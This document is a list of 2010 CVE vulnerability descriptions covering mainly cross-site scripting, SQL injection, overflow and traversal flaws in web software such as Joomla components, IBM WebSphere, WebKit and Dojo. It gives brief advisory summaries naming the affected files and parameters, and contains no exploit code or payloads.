[CVE-2010-2856] Cross-site scripting (XSS) vulnerability in admin/currencies.php in osCSS 1.2.2, and probably earlier versions, allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2010-2854] Multiple cross-site scripting (XSS) vulnerabilities in modfile.php in Event Horizon (EVH) 1.1.10, when magic_quotes_gpc is disabled, allow remote attackers to inject arbitrary web script or HTML via the (1) YourEmail and (2) VerificationNumber parameters, which are not properly handled in a forced SQL error message. NOTE: some of these details are obtained from third party information.
[CVE-2010-2852] Cross-site scripting (XSS) vulnerability in modules/headlines/magpierss/scripts/magpie_debug.php in RunCms 2.1, when the Headlines module is enabled, allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2010-2849] Cross-site scripting (XSS) vulnerability in productionnu2/nuedit.php in nuBuilder 10.04.20, and possibly other versions before 10.07.12, allows remote attackers to inject arbitrary web script or HTML via the f parameter.
[CVE-2010-2846] Cross-site scripting (XSS) vulnerability in the InterJoomla ArtForms (com_artforms) component 2.1b7.2 RC2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the afmsg parameter to index.php.
[CVE-2010-2844] Cross-site scripting (XSS) vulnerability in news_show.php in Newanz NewsOffice 2.0.18 allows remote attackers to inject arbitrary web script or HTML via the n-cat parameter.
[CVE-2010-2802] Cross-site scripting (XSS) vulnerability in MantisBT before 1.2.2 allows remote authenticated users to inject arbitrary web script or HTML via an HTML document with a .gif filename extension, related to inline attachments.
[CVE-2010-2796] Cross-site scripting (XSS) vulnerability in phpCAS before 1.1.2, when proxy mode is enabled, allows remote attackers to inject arbitrary web script or HTML via a callback URL.
[CVE-2010-2790] Multiple cross-site scripting (XSS) vulnerabilities in the formatQuery function in frontends/php/include/classes/class.curl.php in Zabbix before 1.8.3rc1 allow remote attackers to inject arbitrary web script or HTML via the (1) filter_set, (2) show_details, (3) filter_rst, or (4) txt_select parameters to the triggers page (tr_status.php). NOTE: some of these details are obtained from third party information.
[CVE-2010-2788] Cross-site scripting (XSS) vulnerability in profileinfo.php in MediaWiki before 1.15.5, when wgEnableProfileInfo is enabled, allows remote attackers to inject arbitrary web script or HTML via the filter parameter.
[CVE-2010-2779] Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupWise 8.x before 8.0 SP2 allows remote attackers to inject arbitrary web script or HTML via a crafted message, related to "replies."
[CVE-2010-2778] Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupWise 7.x before 7.0 post-SP4 FTF and 8.x before 8.0 SP2 allows remote attackers to inject arbitrary web script or HTML via a crafted message, related to a "Javascript XSS exploit."
[CVE-2010-2769] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 allows user-assisted remote attackers to inject arbitrary web script or HTML via a selection that is added to a document in which the designMode property is enabled.
[CVE-2010-2764] Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 do not properly restrict read access to the statusText property of XMLHttpRequest objects, which allows remote attackers to discover the existence of intranet web servers via cross-origin requests.
[CVE-2010-2756] Search.pm in Bugzilla 2.19.1 through 3.2.7, 3.3.1 through 3.4.7, 3.5.1 through 3.6.1, and 3.7 through 3.7.2 allows remote attackers to determine the group memberships of arbitrary users via vectors involving the Search interface, boolean charts, and group-based pronouns.
[CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability."
[CVE-2010-2734] Cross-site scripting (XSS) vulnerability in the mobile portal in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability."
[CVE-2010-2733] Cross-site scripting (XSS) vulnerability in the Web Monitor in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "UAG XSS Allows EOP Vulnerability."
[CVE-2010-2724] Cross-site scripting (XSS) vulnerability in the Hierarchical Select module 5.x before 5.x-3.2 and 6.x before 6.x-3.2 for Drupal allows remote authenticated users, with administer taxonomy permissions, to inject arbitrary web script or HTML via unspecified vectors in the hierarchical_select form.
[CVE-2010-2723] Cross-site scripting (XSS) vulnerability in LISTSERV 15 and 16 allows remote attackers to inject arbitrary web script or HTML via the T parameter. NOTE: the provenance of this information is unknown
[CVE-2010-2722] Cross-site scripting (XSS) vulnerability in index.php in RightInPoint Lyrics Script 3.0 allows remote attackers to inject arbitrary web script or HTML via the artist_id parameter, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown
[CVE-2010-2718] Multiple cross-site scripting (XSS) vulnerabilities in CruxSoftware CruxPA 2.00, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) txtusername parameter to login.php, (2) todo parameter to newtodo.php, and unspecified vectors to (3) newtelephone.php and (4) newappointment.php.
[CVE-2010-2717] Cross-site scripting (XSS) vulnerability in manager/login.php in CruxSoftware CruxCMS 3.0, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the txtusername parameter.
[CVE-2010-2715] Cross-site scripting (XSS) vulnerability in photos/index.php in TCW PHP Album 1.0 allows remote attackers to inject arbitrary web script or HTML via the album parameter.
[CVE-2010-2709] Stack-based buffer overflow in webappmon.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via a long OvJavaLocale value in a cookie.
[CVE-2010-2703] Stack-based buffer overflow in the execvp_nc function in the ov.dll module in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53, when running on Windows, allows remote attackers to execute arbitrary code via a long HTTP request to webappmon.exe.
[CVE-2010-2700] Cross-site scripting (XSS) vulnerability in index.php in Edge PHP Clickbank Affiliate Marketplace Script (CBQuick) allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2010-2698] Multiple cross-site scripting (XSS) vulnerabilities in Sijio Community Software allow remote authenticated users to inject arbitrary web script or HTML via the title parameter when (1) editing a new blog, (2) adding an album, or (3) editing an album. NOTE: the provenance of this information is unknown
[CVE-2010-2697] Cross-site scripting (XSS) vulnerability in Sijio Community Software allows remote authenticated users to inject arbitrary web script or HTML via the title parameter when adding a new blog, related to edit_blog/index.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-2692] Cross-site scripting (XSS) vulnerability in 2daybiz Custom T-Shirt Design Script allows remote attackers to inject arbitrary web script or HTML via a review comment.
[CVE-2010-2689] SQL injection vulnerability in cont_form.php in Internet DM WebDM CMS allows remote attackers to execute arbitrary SQL commands via the cf_id parameter.
[CVE-2010-2679] SQL injection vulnerability in the Weblinks (com_weblinks) component in Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a view action to index.php.
[CVE-2010-2677] PHP remote file inclusion vulnerability in mw_plugin.php in Open Web Analytics (OWA) 1.2.3, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the IP parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-2676] Multiple directory traversal vulnerabilities in index.php in Open Web Analytics (OWA) 1.2.3 might allow remote attackers to read arbitrary files via directory traversal sequences in the (1) owa_action and (2) owa_do parameters.
[CVE-2010-2675] Cross-site scripting (XSS) vulnerability in index.php in TSOKA:CMS 1.1, 1.9, and 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter in an articolo action.
[CVE-2010-2671] Cross-site scripting (XSS) vulnerability in advancedsearch.php in eZ Publish 3.7.0 through 4.2.0 allows remote attackers to inject arbitrary web script or HTML via the subTreeItem parameter.
[CVE-2010-2670] SQL injection vulnerability in recipedetail.php in BrotherScripts Recipe Website allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2010-2669] Cross-site scripting (XSS) vulnerability in admin/editors/text/editor-body.php in Orbis CMS 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2010-2668] Unspecified vulnerability in Adaptive Micro Systems ALPHA Ethernet Adapter II Web-Manager 3.40.2 allows remote attackers to bypass authentication and read or write configuration files via unknown vectors.
[CVE-2010-2665] Cross-site scripting (XSS) vulnerability in Opera before 10.54 on Windows and Mac OS X, and before 10.11 on UNIX platforms, allows remote attackers to inject arbitrary web script or HTML via a data: URI, related to incorrect detection of the "opening site."
[CVE-2010-2659] Opera before 10.50 on Windows, before 10.52 on Mac OS X, and before 10.60 on UNIX platforms makes widget properties accessible to third-party domains, which allows remote attackers to obtain potentially sensitive information via a crafted web site.
[CVE-2010-2658] Opera before 10.60 does not properly restrict certain interaction between plug-ins, file inputs, and the clipboard, which allows user-assisted remote attackers to trigger the uploading of arbitrary files via a crafted web site.
[CVE-2010-2657] Opera before 10.60 on Windows and Mac OS X does not properly prevent certain double-click operations from running a program located on a web site, which allows user-assisted remote attackers to execute arbitrary code via a crafted web page that bypasses a dialog.
[CVE-2010-2656] The IBM BladeCenter with Advanced Management Module (AMM) firmware build ID BPET48L, and possibly other versions before 4.7 and 5.0, stores sensitive information under the web root with insufficient access control, which allows remote attackers to download (1) logs or (2) core files via direct requests, as demonstrated by a request for private/sdc.tgz.
[CVE-2010-2654] Multiple cross-site scripting (XSS) vulnerabilities on the IBM BladeCenter with Advanced Management Module (AMM) firmware build ID BPET48L, and possibly other versions before 4.7 and 5.0, allow remote attackers to inject arbitrary web script or HTML via the (1) INDEX or (2) IPADDR parameter to private/cindefn.php, (3) the domain parameter to private/power_management_policy_options.php, the slot parameter to (4) private/pm_temp.php or (5) private/power_module.php, (6) the WEBINDEX parameter to private/blade_leds.php, or (7) the SLOT parameter to private/ipmi_bladestatus.php.
[CVE-2010-2645] Unspecified vulnerability in Google Chrome before 5.0.375.99, when WebGL is used, allows remote attackers to cause a denial of service (out-of-bounds read) via unknown vectors.
[CVE-2010-2639] IBM WebSphere Commerce Enterprise 7.0 before 7.0.0.2 allows remote attackers to read messages intended for other recipients via vectors involving access by the outbound messaging system to the RunTimeProfileCacheCmdImpl class, related to the caching of mutable objects and "concurrency issues."
[CVE-2010-2638] Unspecified vulnerability in IBM WebSphere MQ 7.0 before 7.0.1.5 allows remote authenticated users to cause a denial of service (disk consumption) via vectors that trigger an FDC with an RM680004 Probe Id value.
[CVE-2010-2637] IBM WebSphere MQ 6.0 before 6.0.2.9 and 7.0 before 7.0.1.1 does not encrypt the username and password in the security parameters field, which allows remote attackers to obtain sensitive information by sniffing the network traffic from a .NET client application.
[CVE-2010-2636] Multiple cross-site scripting (XSS) vulnerabilities in sample store pages in IBM WebSphere Commerce 7.0 before 7.0.0.1 allow remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2010-2635] SQL injection vulnerability in IBM WebSphere Commerce 6.0 before 6.0.0.10 allows remote authenticated users to execute arbitrary SQL commands via unspecified parameters to "Commerce Organization Admin Console JavaServer pages."
[CVE-2010-2617] Cross-site scripting (XSS) vulnerability in bible.php in PHP Bible Search allows remote attackers to inject arbitrary web script or HTML via the chapter parameter.
[CVE-2010-2615] Multiple cross-site scripting (XSS) vulnerabilities in admin/admin.php in Grafik CMS 1.1.2, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) page_menu and (2) description parameters in an edit_page action.
[CVE-2010-2613] Cross-site scripting (XSS) vulnerability in the JExtensions JE Awd Song (com_awd_song) component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the song review field, which is not properly handled in a view action to index.php.
[CVE-2010-2599] Unspecified vulnerability in Research In Motion (RIM) BlackBerry Device Software before 6.0.0 allows remote attackers to cause a denial of service (browser hang) via a crafted web page.
[CVE-2010-2574] Cross-site scripting (XSS) vulnerability in manage_proj_cat_add.php in MantisBT 1.2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via the name parameter in an Add Category action.
[CVE-2010-2545] Multiple cross-site scripting (XSS) vulnerabilities in Cacti before 0.8.7g, as used in Red Hat High Performance Computing (HPC) Solution and other products, allow remote attackers to inject arbitrary web script or HTML via (1) the name element in an XML template to templates_import.php
[CVE-2010-2544] Cross-site scripting (XSS) vulnerability in utilities.php in Cacti before 0.8.7g, as used in Red Hat High Performance Computing (HPC) Solution and other products, allows remote attackers to inject arbitrary web script or HTML via the filter parameter.
[CVE-2010-2543] Cross-site scripting (XSS) vulnerability in include/top_graph_header.php in Cacti before 0.8.7g allows remote attackers to inject arbitrary web script or HTML via the graph_start parameter to graph.php. NOTE: this vulnerability exists because of an incorrect fix for CVE-2009-4032.2.b.
[CVE-2010-2536] Multiple cross-site scripting (XSS) vulnerabilities in rekonq 0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) a URL associated with a nonexistent domain name, related to webpage.cpp, aka a "universal XSS" issue
[CVE-2010-2535] Multiple cross-site scripting (XSS) vulnerabilities in the Back End in Joomla! 1.5.x before 1.5.20 allow remote authenticated users to inject arbitrary web script or HTML via administrator screens.
[CVE-2010-2514] Cross-site scripting (XSS) vulnerability in the JFaq (com_jfaq) component 1.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the question parameter in an add2 action to index.php.
[CVE-2010-2510] SQL injection vulnerability in customize.php in 2daybiz Web Template Software allows remote attackers to execute arbitrary SQL commands via the tid parameter.
[CVE-2010-2509] Multiple cross-site scripting (XSS) vulnerabilities in 2daybiz Web Template Software allow remote attackers to inject arbitrary web script or HTML via the (1) keyword parameter to category.php and the (2) password parameter to memberlogin.php.
[CVE-2010-2506] Cross-site scripting (XSS) vulnerability in debug.cgi in Linksys WAP54Gv3 firmware 3.05.03 and 3.04.03 allows remote attackers to inject arbitrary web script or HTML via the data1 parameter.
[CVE-2010-2505] Soft SaschArt SasCAM Webcam Server 2.6.5, 2.7, and earlier allows remote attackers to cause a denial of service (crash) via a large number of requests with a long line, as demonstrated using a long GET request.
[CVE-2010-2503] Multiple cross-site scripting (XSS) vulnerabilities in Splunk 4.0 through 4.0.10 and 4.1 through 4.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) redirects, aka SPL-31067
[CVE-2010-2495] The pppol2tp_xmit function in drivers/net/pppol2tp.c in the L2TP implementation in the Linux kernel before 2.6.34 does not properly validate certain values associated with an interface, which allows attackers to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact via vectors related to a routing change.
[CVE-2010-2493] The default configuration of the deployment descriptor (aka web.xml) in picketlink-sts.war in (1) the security_saml quickstart, (2) the webservice_proxy_security quickstart, (3) the web-console application, (4) the http-invoker application, (5) the gpd-deployer application, (6) the jbpm-console application, (7) the contract application, and (8) the uddi-console application in JBoss Enterprise SOA Platform before 5.0.2 contains GET and POST http-method elements, which allows remote attackers to bypass intended access restrictions via a crafted HTTP request.
[CVE-2010-2491] Cross-site scripting (XSS) vulnerability in cgi/client.py in Roundup before 1.4.14 allows remote attackers to inject arbitrary web script or HTML via the template argument to the /issue program.
[CVE-2010-2487] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, 1.8.x before 1.8.8, and 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) Page.py, (2) PageEditor.py, (3) PageGraphicalEditor.py, (4) action/CopyPage.py, (5) action/Load.py, (6) action/RenamePage.py, (7) action/backup.py, (8) action/login.py, (9) action/newaccount.py, and (10) action/recoverpass.py.
[CVE-2010-2479] Cross-site scripting (XSS) vulnerability in HTML Purifier before 4.1.1, as used in Mahara and other products, when the browser is Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2477] Multiple cross-site scripting (XSS) vulnerabilities in the paste.httpexceptions implementation in Paste before 1.7.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving a 404 status code, related to (1) paste.urlparser.StaticURLParser, (2) paste.urlparser.PkgResourcesParser, (3) paste.urlmap.URLMap, and (4) HTTPNotFound.
[CVE-2010-2470] Install/Filesystem.pm in Bugzilla 3.5.1 through 3.6.1 and 3.7 through 3.7.1, when use_suexec is enabled, uses world-readable permissions within (1) .bzr/ and (2) data/webdot/, which allows local users to obtain potentially sensitive data by reading files in these directories, a different vulnerability than CVE-2010-0180.
[CVE-2010-2465] The S2 Security NetBox 2.5, 3.3, and 4.0, as used in the Linear eMerge 50 and 5000 and the Sonitrol eAccess, stores sensitive information under the web root with insufficient access control, which allows remote attackers to download node logs, photographs of persons, and backup files via unspecified HTTP requests.
[CVE-2010-2464] Multiple cross-site scripting (XSS) vulnerabilities in the RSComments (com_rscomments) component 1.0.0 Rev 2 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) website and (2) name parameters to index.php.
[CVE-2010-2463] Cross-site scripting (XSS) vulnerability in forum.php in Jamroom before 4.1.9 allows remote attackers to inject arbitrary web script or HTML via the post_id parameter in a modify action.
[CVE-2010-2458] Cross-site scripting (XSS) vulnerability in video.php in 2daybiz Video Community Portal Script 1.0 allows remote attackers to inject arbitrary web script or HTML via the videoid parameter.
[CVE-2010-2457] Cross-site scripting (XSS) vulnerability in index.php in K-Search allows remote attackers to inject arbitrary web script or HTML via the term parameter.
[CVE-2010-2448] znc.cpp in ZNC before 0.092 allows remote authenticated users to cause a denial of service (crash) by requesting traffic statistics when there is an active unauthenticated connection, which triggers a NULL pointer dereference, as demonstrated using (1) a traffic link in the web administration pages or (2) the traffic command in the /znc shell.
[CVE-2010-2441] WebKit does not properly restrict focus changes, which allows remote attackers to read keystrokes via "cross-domain IFRAME gadgets," a different vulnerability than CVE-2010-1126, CVE-2010-1422, and CVE-2010-2295.
[CVE-2010-2437] Cross-site scripting (XSS) vulnerability in class/tools.class.php in AneCMS Blog 1.3 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the comment variable to modules/blog/index.php.
[CVE-2010-2435] Weborf HTTP Server 0.12.1 and earlier allows remote attackers to cause a denial of service (crash) via Unicode characters in a Connection HTTP header, and possibly other headers.
[CVE-2010-2433] Multiple cross-site scripting (XSS) vulnerabilities in content/internalError.jsp in IBM WebSphere ILOG JRules 6.7 allow remote attackers to inject arbitrary web script or HTML via an RTS URL to (1) explore/explore.jsp, (2) compose/compose.jsp, or (3) home.jsp in faces/.
[CVE-2010-2429] Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.1.2, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer in a "404 Not Found" response.
[CVE-2010-2422] Cross-site scripting (XSS) vulnerability in PortalTransforms in Plone 2.1 through 3.3.4 before hotfix 20100612 allows remote attackers to inject arbitrary web script or HTML via the safe_html transform.
[CVE-2010-2420] Multiple unspecified vulnerabilities in Fenrir Inc. ActiveGeckoBrowser 1.0.0 and 1.0.5 alpha, a module for the Sleipnir web browser, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors related to the Gecko engine.
[CVE-2010-2385] Unspecified vulnerability in Oracle Sun Java System Web Proxy Server 4.0.13 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Administration Server.
[CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
[CVE-2010-2367] Cross-site scripting (XSS) vulnerability in search.cgi in AD-EDIT2 before 3.0.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2366] Cross-site scripting (XSS) vulnerability in futomi CGI Cafe Access Analyzer CGI Professional, and Standard 4.0.2 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2365] Cross-site scripting (XSS) vulnerability in Free CGI Moo moobbs2 before 1.03 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2364] Cross-site scripting (XSS) vulnerability in Free CGI Moo moobbs before 1.03 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2359] SQL injection vulnerability in eWebQuiz.asp in ActiveWebSoftwares.com eWebquiz 8 allows remote attackers to execute arbitrary SQL commands via the QuizType parameter, a different vector than CVE-2007-1706.
[CVE-2010-2356] Cross-site scripting (XSS) vulnerability in subscribe.php in Pilot Group (PG) eLMS Pro allows remote attackers to inject arbitrary web script or HTML via the course_id parameter.
[CVE-2010-2355] Cross-site scripting (XSS) vulnerability in error.php in Pilot Group (PG) eLMS Pro allows remote attackers to inject arbitrary web script or HTML via the message parameter. NOTE: the provenance of this information is unknown
[CVE-2010-2349] H264WebCam 3.7 allows remote attackers to cause a denial of service (crash) via a long URI in a GET request, which triggers a NULL pointer dereference. NOTE: some of these details are obtained from third party information.
[CVE-2010-2347] The Telnet interface in the SAP J2EE Engine Core (SAP-JEECOR) 6.40 through 7.02, and Server Core (SERVERCORE) 7.10 through 7.30 allows remote authenticated users to bypass a security check and conduct SMB relay attacks via unspecified vectors.
[CVE-2010-2344] Multiple cross-site scripting (XSS) vulnerabilities in odCMS 1.06, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the Page parameter to (1) _main/index.php, (2) _members/index.php, (3) _forum/index.php, (4) _docs/index.php, and (5) _announcements/index.php.
[CVE-2010-2338] Multiple SQL injection vulnerabilities in redir.asp in VU Web Visitor Analyst allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-2337] Open redirect vulnerability in RSA Federated Identity Manager 4.0 before 4.0.25 and 4.1 before 4.1.26 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unknown vectors.
[CVE-2010-2336] index.php in Yamamah Photo Gallery 1.00 allows remote attackers to obtain the source code of executable files within the web document root via the download parameter.
[CVE-2010-2333] LiteSpeed Technologies LiteSpeed Web Server 4.0.x before 4.0.15 allows remote attackers to read the source code of scripts via an HTTP request with a null byte followed by a .txt file extension.
[CVE-2010-2328] The HTTP Channel in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 allows remote attackers to cause a denial of service (NullPointerException) via a large amount of chunked data that uses gzip compression.
[CVE-2010-2327] mod_ibm_ssl in IBM HTTP Server 6.0 before 6.0.2.43, 6.1 before 6.1.0.33, and 7.0 before 7.0.0.11, as used in IBM WebSphere Application Server (WAS) on z/OS, does not properly handle a large HTTP request body in uploading over SSL, which might allow remote attackers to cause a denial of service (daemon fail) via an upload.
[CVE-2010-2326] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11, when addNode -trace is used during node federation, allows attackers to obtain sensitive information about CIMMetadataCollectorImpl trace actions by reading the addNode.log file.
[CVE-2010-2325] Cross-site scripting (XSS) vulnerability in the administrative console in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 on z/OS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related in part to "URL injection."
[CVE-2010-2324] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 on z/OS allows attackers to perform unspecified "link injection" actions via unknown vectors.
[CVE-2010-2323] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 on z/OS might allow attackers to obtain sensitive information by reading the default_create.log file that is associated with profile creation by the BBOWWPFx job and the zPMT.
[CVE-2010-2318] Cross-site scripting (XSS) vulnerability in cms_data.php in PHPCityPortal 1.3 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2010-2316] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in WmsCms 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) sbr, (3) p, and (4) sbl parameters, different vectors than CVE-2007-3137.
[CVE-2010-2309] Buffer overflow in the web server for EvoLogical EvoCam 3.6.6 and 3.6.7 allows remote attackers to execute arbitrary code via a long GET request.
[CVE-2010-2307] Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
[CVE-2010-2302] Use-after-free vulnerability in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via vectors involving remote fonts in conjunction with shadow DOM trees, aka rdar problem 8007953. NOTE: this might overlap CVE-2010-1771.
[CVE-2010-2301] Cross-site scripting (XSS) vulnerability in editing/markup.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to inject arbitrary web script or HTML via vectors related to the node.innerHTML property of a TEXTAREA element. NOTE: this might overlap CVE-2010-1762.
[CVE-2010-2300] Use-after-free vulnerability in the Element::normalizeAttributes function in dom/Element.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors related to handlers for DOM mutation events, aka rdar problem 7948784. NOTE: this might overlap CVE-2010-1759.
[CVE-2010-2297] rendering/FixedTableLayout.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an HTML document that has a large colspan attribute within a table.
[CVE-2010-2295] page/EventHandler.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 does not properly handle a change of the focused frame during the dispatching of keydown, which allows user-assisted remote attackers to redirect keystrokes via a crafted HTML document, aka rdar problem 7018610. NOTE: this might overlap CVE-2010-1422.
[CVE-2010-2290] Cross-site scripting (XSS) vulnerability in cgi-bin/cgix/help in McAfee Unified Threat Management (UTM) Firewall (formerly SnapGear) firmware 3.0.0 through 4.0.6 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2010-2289] Open redirect vulnerability in dana/home/homepage.cgi in Juniper Networks IVE 6.5R1 (Build 14599) and 6.5R2 (Build 14951) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the Location parameter.
[CVE-2010-2288] Cross-site scripting (XSS) vulnerability in dana/nc/ncrun.cgi in Juniper Networks IVE 6.5R1 (Build 14599) and 6.5R2 (Build 14951) allows remote attackers to inject arbitrary web script or HTML via the DSSignInURL cookie.
[CVE-2010-2281] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS 2.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) keyword or (2) bannerid parameter in conjunction with a /admin/ad/banner/list PATH_INFO
[CVE-2010-2280] Open redirect vulnerability in the Mobile component in IBM Lotus Connections 2.5.x before 2.5.0.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, related to "mobile edit actions," aka SPR ASRE83PPVH.
[CVE-2010-2277] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Connections 2.5.x before 2.5.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) create or (2) edit form in the Communities component, the (3) verbiage field in the Bookmarks component, or (4) unspecified vectors related to the Mobile Blogs component.
[CVE-2010-2275] Cross-site scripting (XSS) vulnerability in dijit/tests/_testCommon.js in Dojo Toolkit SDK before 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the theme parameter, as demonstrated by an attack against dijit/tests/form/test_Button.html.
[CVE-2010-2274] Multiple open redirect vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, util/buildscripts/jslib/buildUtil.js, and util/doh/runner.html.
[CVE-2010-2273] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, and util/buildscripts/jslib/buildUtil.js, as demonstrated by the (1) dojoUrl and (2) testUrl parameters to util/doh/runner.html.
[CVE-2010-2271] Format string vulnerability in authcfg.cgi in Accoria Web Server (aka Rock Web Server) 1.4.7 allows remote attackers to have an unspecified impact via format string specifiers in the path (aka Password File) parameter.
[CVE-2010-2270] Accoria Web Server (aka Rock Web Server) 1.4.7 uses a predictable httpmod-sessionid cookie, which makes it easier for remote attackers to hijack sessions via a modified cookie.
[CVE-2010-2269] Directory traversal vulnerability in loadstatic.cgi in Accoria Web Server (aka Rock Web Server) 1.4.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the name parameter.
[CVE-2010-2268] Cross-site request forgery (CSRF) vulnerability in authcfg.cgi in Accoria Web Server (aka Rock Web Server) 1.4.7 allows remote attackers to hijack the authentication of administrators for requests that create user accounts.
[CVE-2010-2267] Multiple cross-site scripting (XSS) vulnerabilities in Accoria Web Server (aka Rock Web Server) 1.4.7 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the getenv sample program, (2) the desc parameter to loadstatic.cgi, (3) the name parameter to httpdcfg.cgi, or (4) the dns parameter to servercfg.cgi.
